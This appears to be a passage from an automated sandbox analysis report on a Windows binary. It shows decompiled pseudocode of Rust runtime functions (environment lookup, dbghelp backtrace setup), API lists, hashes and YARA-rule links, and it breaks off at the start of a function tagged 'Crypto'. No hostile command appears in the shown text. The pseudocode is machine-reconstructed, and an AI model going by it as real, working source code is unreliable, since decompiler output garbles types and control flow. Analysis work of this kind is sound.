							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6F257370( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6F24C310(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6f27d0bc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6F257370( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6F240EC0(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6f28adc8, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6f28adc8, 0, _t167);
													}
													HeapFree( *0x6f28adc8, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6f28adc8, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6f27dec8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6f28adc8, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6f28adc8, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6f28adc8, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6F256C30(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6F256DB0(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6f27ded0);
						asm("ud2");
						__eflags =  &_a8;
						E6F234AA0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6F23D420(_t263);
					} else {
						 *0x6f28adc8 = _t142;
						goto L3;
					}
				}
				L96:
			}







































































                          0x6f23d530
                          0x6f23d530
                          0x6f23d530
                          0x6f23d533
                          0x6f23d534
                          0x6f23d535
                          0x6f23d536
                          0x6f23d53c
                          0x6f23d53f
                          0x6f23d546
                          0x6f23d54d
                          0x6f23d55a
                          0x6f23d55d
                          0x6f23d563
                          0x6f23d56a
                          0x6f23d57e
                          0x6f23d583
                          0x6f23d58a
                          0x00000000
                          0x6f23d590
                          0x6f23d590
                          0x6f23d596
                          0x6f23d59b
                          0x6f23d59d
                          0x6f23d5a2
                          0x6f23d5a8
                          0x6f23d5b2
                          0x6f23d5bc
                          0x6f23d5ed
                          0x6f23d5f0
                          0x6f23d5f3
                          0x00000000
                          0x00000000
                          0x6f23d5f5
                          0x6f23d5fc
                          0x6f23d604
                          0x6f23d5df
                          0x6f23d5df
                          0x6f23d5e2
                          0x6f23d5e6
                          0x6f23d5e7
                          0x00000000
                          0x6f23d606
                          0x6f23d63a
                          0x6f23d644
                          0x6f23d647
                          0x6f23d64e
                          0x6f23d659
                          0x6f23d662
                          0x6f23d66a
                          0x6f23d66d
                          0x6f23d671
                          0x6f23d676
                          0x6f23d5d0
                          0x6f23d5d6
                          0x6f23d5d9
                          0x6f23d5dc
                          0x00000000
                          0x6f23d5dc
                          0x6f23d610
                          0x6f23d616
                          0x6f23d618
                          0x6f23d61e
                          0x6f23d621
                          0x6f23d624
                          0x6f23d627
                          0x6f23d629
                          0x6f23d681
                          0x6f23d68a
                          0x6f23d68c
                          0x6f23d6b3
                          0x6f23d6bb
                          0x6f23d6be
                          0x6f23d6c3
                          0x6f23d6c6
                          0x00000000
                          0x6f23d6c8
                          0x6f23d6c8
                          0x6f23d6cc
                          0x6f23d6d2
                          0x6f23d6d4
                          0x6f23d6da
                          0x00000000
                          0x6f23d6e0
                          0x00000000
                          0x6f23d6e0
                          0x6f23d6da
                          0x6f23d68e
                          0x6f23d68e
                          0x6f23d692
                          0x6f23d695
                          0x6f23d698
                          0x6f23d69b
                          0x6f23d6eb
                          0x6f23d6ed
                          0x6f23d6f3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d69d
                          0x6f23d6a3
                          0x6f23d6a5
                          0x6f23d715
                          0x6f23d715
                          0x6f23d717
                          0x6f23d6a7
                          0x6f23d6ab
                          0x6f23d6ae
                          0x6f23d6ae
                          0x6f23d71a
                          0x6f23d71d
                          0x6f23d71f
                          0x6f23d722
                          0x6f23d745
                          0x6f23d747
                          0x6f23d74a
                          0x6f23d750
                          0x00000000
                          0x6f23d752
                          0x00000000
                          0x6f23d752
                          0x6f23d724
                          0x6f23d724
                          0x6f23d72d
                          0x6f23d72f
                          0x6f23d75a
                          0x6f23d75a
                          0x6f23d75c
                          0x6f23d731
                          0x6f23d737
                          0x6f23d73a
                          0x6f23d73a
                          0x6f23d76f
                          0x6f23d771
                          0x6f23d774
                          0x6f23d77a
                          0x6f23d6f9
                          0x6f23d6f9
                          0x6f23d6fc
                          0x6f23d6fe
                          0x6f23d704
                          0x00000000
                          0x6f23d70a
                          0x00000000
                          0x6f23d70a
                          0x6f23d780
                          0x6f23d780
                          0x6f23d780
                          0x6f23d786
                          0x6f23d7a0
                          0x6f23d7a3
                          0x6f23d7a6
                          0x6f23d7a8
                          0x6f23d7ab
                          0x6f23d7b1
                          0x00000000
                          0x6f23d7b7
                          0x00000000
                          0x6f23d7b7
                          0x6f23d7b1
                          0x6f23d77a
                          0x6f23d722
                          0x6f23d69b
                          0x6f23d62b
                          0x6f23d62b
                          0x6f23d62d
                          0x6f23d630
                          0x6f23d632
                          0x6f23d638
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d638
                          0x00000000
                          0x6f23d629
                          0x6f23d7bc
                          0x6f23d7c2
                          0x6f23d7ca
                          0x6f23d7cd
                          0x6f23d7d2
                          0x6f23d7d5
                          0x6f23d7d7
                          0x6f23d7da
                          0x6f23d7dc
                          0x6f23d824
                          0x6f23d824
                          0x6f23d826
                          0x6f23d830
                          0x6f23d830
                          0x6f23d832
                          0x00000000
                          0x00000000
                          0x6f23d838
                          0x6f23d83b
                          0x6f23d83f
                          0x6f23d842
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d842
                          0x6f23d8d0
                          0x6f23d8d3
                          0x6f23d8d5
                          0x6f23d8e1
                          0x6f23d8e6
                          0x6f23d8e9
                          0x6f23d8ec
                          0x6f23d8ec
                          0x6f23d8ef
                          0x6f23d8f5
                          0x6f23d8fa
                          0x6f23d8ff
                          0x6f23d902
                          0x6f23d904
                          0x6f23d907
                          0x00000000
                          0x6f23d90d
                          0x6f23d910
                          0x6f23d921
                          0x6f23d926
                          0x6f23d929
                          0x6f23d92e
                          0x6f23d933
                          0x6f23d935
                          0x6f23d938
                          0x6f23d93f
                          0x6f23d942
                          0x6f23d949
                          0x6f23d94f
                          0x6f23d972
                          0x6f23d977
                          0x6f23d97b
                          0x6f23d97d
                          0x6f23d97f
                          0x6f23d982
                          0x6f23d98f
                          0x6f23d994
                          0x6f23d99a
                          0x6f23d99d
                          0x6f23d99d
                          0x6f23d9a0
                          0x6f23d9a3
                          0x6f23d9a5
                          0x6f23d9a8
                          0x6f23d951
                          0x6f23d9b0
                          0x6f23d9b0
                          0x6f23d9b6
                          0x6f23d9b6
                          0x6f23d9bd
                          0x6f23d9bd
                          0x6f23d9c2
                          0x6f23d9cd
                          0x6f23d9d3
                          0x6f23d9d5
                          0x6f23d9d7
                          0x6f23d9e3
                          0x6f23d9e3
                          0x6f23d9e5
                          0x6f23d960
                          0x6f23d960
                          0x6f23d962
                          0x6f23d964
                          0x6f23da26
                          0x6f23da29
                          0x6f23da30
                          0x6f23da32
                          0x00000000
                          0x6f23da38
                          0x6f23da3e
                          0x6f23da3f
                          0x6f23da44
                          0x6f23da47
                          0x6f23da4a
                          0x6f23da4d
                          0x6f23da50
                          0x6f23da52
                          0x6f23da55
                          0x6f23da57
                          0x00000000
                          0x00000000
                          0x6f23da59
                          0x00000000
                          0x6f23da57
                          0x6f23d96a
                          0x6f23d96a
                          0x6f23d970
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d970
                          0x6f23d9eb
                          0x6f23d9eb
                          0x6f23d9f1
                          0x6f23d9f4
                          0x00000000
                          0x6f23d9fa
                          0x6f23d9fa
                          0x6f23d9fc
                          0x6f23da02
                          0x00000000
                          0x6f23da04
                          0x00000000
                          0x6f23da04
                          0x00000000
                          0x6f23da02
                          0x6f23d9f4
                          0x6f23d9d9
                          0x6f23d9d9
                          0x6f23d9df
                          0x6f23d9e1
                          0x6f23da5b
                          0x6f23da5d
                          0x6f23da63
                          0x6f23da65
                          0x6f23da67
                          0x6f23da6a
                          0x6f23da6c
                          0x6f23da6e
                          0x6f23da6e
                          0x6f23da72
                          0x6f23da74
                          0x6f23da79
                          0x6f23da86
                          0x6f23da89
                          0x6f23da8e
                          0x6f23da8e
                          0x6f23da79
                          0x6f23da72
                          0x6f23da91
                          0x6f23da91
                          0x6f23da93
                          0x6f23daed
                          0x6f23daf0
                          0x6f23daf2
                          0x6f23daf5
                          0x6f23da95
                          0x6f23da98
                          0x6f23da9b
                          0x6f23daa1
                          0x6f23daa8
                          0x6f23dab0
                          0x6f23dab3
                          0x6f23dab5
                          0x6f23dab8
                          0x6f23dabb
                          0x6f23dabe
                          0x6f23dac2
                          0x6f23dac4
                          0x6f23dac6
                          0x6f23daca
                          0x6f23dacc
                          0x6f23dacc
                          0x6f23dad8
                          0x6f23dad8
                          0x6f23dae6
                          0x6f23dae6
                          0x6f23daa1
                          0x6f23daf8
                          0x6f23daff
                          0x6f23db10
                          0x6f23db10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d9e1
                          0x6f23d9d7
                          0x6f23d7de
                          0x6f23d7de
                          0x6f23d7e0
                          0x6f23d7e2
                          0x6f23d7e2
                          0x6f23d7e6
                          0x00000000
                          0x00000000
                          0x6f23d7e8
                          0x6f23d7ed
                          0x00000000
                          0x6f23d7ef
                          0x6f23d7ef
                          0x6f23d7f4
                          0x00000000
                          0x6f23d7f6
                          0x6f23d7f6
                          0x6f23d7fb
                          0x00000000
                          0x6f23d7fd
                          0x6f23d7fd
                          0x6f23d802
                          0x00000000
                          0x6f23d804
                          0x6f23d804
                          0x6f23d809
                          0x00000000
                          0x6f23d80b
                          0x6f23d80b
                          0x6f23d810
                          0x00000000
                          0x6f23d812
                          0x6f23d812
                          0x6f23d817
                          0x00000000
                          0x6f23d819
                          0x6f23d819
                          0x6f23d81c
                          0x6f23d81f
                          0x6f23d822
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23d822
                          0x6f23d817
                          0x6f23d810
                          0x6f23d809
                          0x6f23d802
                          0x6f23d7fb
                          0x6f23d7f4
                          0x00000000
                          0x6f23d7ed
                          0x6f23d844
                          0x6f23d844
                          0x6f23d847
                          0x6f23d84e
                          0x6f23d855
                          0x6f23d857
                          0x6f23d859
                          0x6f23d85b
                          0x6f23d85d
                          0x6f23d863
                          0x6f23d86e
                          0x6f23d86e
                          0x6f23d863
                          0x6f23d85b
                          0x6f23d873
                          0x6f23d877
                          0x6f23d87d
                          0x6f23d882
                          0x6f23d885
                          0x6f23d888
                          0x6f23d890
                          0x6f23d892
                          0x6f23d895
                          0x6f23d898
                          0x6f23d89b
                          0x6f23d89f
                          0x6f23d8a1
                          0x6f23d8a3
                          0x6f23d8a7
                          0x6f23d8a9
                          0x6f23d8a9
                          0x6f23d8b5
                          0x6f23d8ba
                          0x6f23d8ba
                          0x6f23d8c6
                          0x6f23d8c6
                          0x6f23da09
                          0x6f23da0c
                          0x6f23da12
                          0x6f23da12
                          0x6f23da15
                          0x6f23da25
                          0x6f23da25
                          0x00000000
                          0x6f23d7dc
                          0x6f23d5ed
                          0x6f23d56c
                          0x6f23d56c
                          0x6f23d573
                          0x6f23db1a
                          0x6f23db1f
                          0x6f23db24
                          0x6f23db29
                          0x6f23db2b
                          0x6f23db32
                          0x6f23db3a
                          0x6f23db44
                          0x6f23db4f
                          0x6f23db5f
                          0x6f23d579
                          0x6f23d579
                          0x00000000
                          0x6f23d579
                          0x6f23d573
                          0x00000000

                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6F23D56C
                          • HeapAlloc.KERNEL32(01310000,00000000,0000000A), ref: 6F23D583
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID: RUST_BACKTRACE
                          • API String ID: 1617791916-3454309823
                          • Opcode ID: 9d251eec66f0067093a87a357a903c331de8a4084c9ed90bcf010b0dafe20a80
                          • Instruction ID: 7ce88c56821cf0cd2824397c00232cae40842050e2ed89600fc0764bbe9a9c7f
                          • Opcode Fuzzy Hash: 9d251eec66f0067093a87a357a903c331de8a4084c9ed90bcf010b0dafe20a80
                          • Instruction Fuzzy Hash: 98029CF2E0022D8BDB14CFA8C984BDDB7B2BF49314F94411AD825AB380D7B5A945CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23E690, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135libraryloadersynchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 52%
                          			E6F23E690(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6F243BA0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6f28adc4; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6f28adc4], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6f28add0; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6f28ae04 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6f28add4; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6f28add8; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6f28addc; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6f28ae04 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6f28add0, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6F256E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6f27dcac);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6f28addc = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6f28add0, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6F256E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6f27dc9c);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6f28add8 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6F256E20(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6f27dc8c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6F23E880(_v36);
								} else {
									_t38 = _t30;
									 *0x6f28add4 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6f28add0 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}






















                          0x6f23e690
                          0x6f23e694
                          0x6f23e699
                          0x6f23e69c
                          0x6f23e6a3
                          0x6f23e6b4
                          0x6f23e6b7
                          0x6f23e6bd
                          0x6f23e6c5
                          0x6f23e7a5
                          0x6f23e7aa
                          0x6f23e7ac
                          0x6f23e7d0
                          0x00000000
                          0x6f23e7ae
                          0x6f23e7ae
                          0x6f23e7b0
                          0x6f23e7b2
                          0x6f23e7ba
                          0x6f23e7c3
                          0x6f23e7c9
                          0x6f23e7c9
                          0x00000000
                          0x6f23e7ba
                          0x6f23e6cb
                          0x6f23e6cb
                          0x6f23e6d0
                          0x6f23e6d5
                          0x6f23e6dc
                          0x6f23e6f5
                          0x6f23e6f5
                          0x6f23e6fe
                          0x00000000
                          0x6f23e704
                          0x6f23e704
                          0x6f23e70c
                          0x6f23e729
                          0x6f23e729
                          0x6f23e72b
                          0x6f23e731
                          0x6f23e735
                          0x6f23e757
                          0x6f23e75b
                          0x6f23e75d
                          0x6f23e765
                          0x6f23e787
                          0x6f23e787
                          0x6f23e791
                          0x6f23e793
                          0x00000000
                          0x6f23e767
                          0x6f23e772
                          0x6f23e77a
                          0x6f23e83d
                          0x6f23e840
                          0x6f23e856
                          0x00000000
                          0x6f23e780
                          0x6f23e780
                          0x6f23e782
                          0x00000000
                          0x6f23e782
                          0x6f23e77a
                          0x6f23e737
                          0x6f23e742
                          0x6f23e74a
                          0x6f23e81a
                          0x6f23e81d
                          0x6f23e833
                          0x00000000
                          0x6f23e750
                          0x6f23e750
                          0x6f23e752
                          0x00000000
                          0x6f23e752
                          0x6f23e74a
                          0x6f23e70e
                          0x6f23e714
                          0x6f23e71c
                          0x6f23e7f7
                          0x6f23e7fa
                          0x6f23e810
                          0x6f23e85e
                          0x6f23e85e
                          0x6f23e864
                          0x6f23e873
                          0x6f23e722
                          0x6f23e722
                          0x6f23e724
                          0x00000000
                          0x6f23e724
                          0x6f23e71c
                          0x6f23e70c
                          0x6f23e6de
                          0x6f23e6e3
                          0x6f23e6ea
                          0x6f23e6ef
                          0x6f23e7d8
                          0x6f23e7dd
                          0x6f23e7e2
                          0x6f23e7e7
                          0x6f23e7f6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f23e6ef
                          0x6f23e6dc

                          APIs
                          • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6F23E6D0
                          • LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6F23E6E3
                          • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6F23E714
                          • GetProcAddress.KERNEL32(SymSetOptions), ref: 6F23E742
                          • GetProcAddress.KERNEL32(SymInitializeW), ref: 6F23E772
                          • GetCurrentProcess.KERNEL32 ref: 6F23E787
                          • CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6F23E7A5
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6F23E7C3
                            • Part of subcall function 6F23E880: ReleaseMutex.KERNEL32(?,6F23E5F8), ref: 6F23E881
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
                          • String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
                          • API String ID: 1067696788-3213342004
                          • Opcode ID: e8d5fead8c35136d0c54d17efe06f5ba1214f79b2424ea4de5b8f732776010fd
                          • Instruction ID: 147657f86a18cf3ac8e339e9cd13d4e91b5efbefdcafdd631cb90e1ec3c024ed
                          • Opcode Fuzzy Hash: e8d5fead8c35136d0c54d17efe06f5ba1214f79b2424ea4de5b8f732776010fd
                          • Instruction Fuzzy Hash: 214195F2E00B59A7DB149B64CD48B9A77A6AB46325F000139E416D7BC0DFB4AC1DCF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122EDED, Relevance: 25.7, Strings: 20, Instructions: 740COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 95%
                          			E0122EDED(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				void* _t878;
				intOrPtr _t886;
				void* _t887;
				signed int _t889;
				void* _t899;
				void* _t904;
				void* _t912;
				void* _t916;
				void* _t917;
				void* _t925;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				void* _t948;
				intOrPtr _t949;
				char _t960;
				void* _t967;
				void* _t974;
				void* _t1020;
				void* _t1041;
				signed int _t1044;
				intOrPtr _t1045;
				void* _t1049;
				signed int* _t1051;
				signed int* _t1054;
				void* _t1056;

				_t1051 =  &_v432;
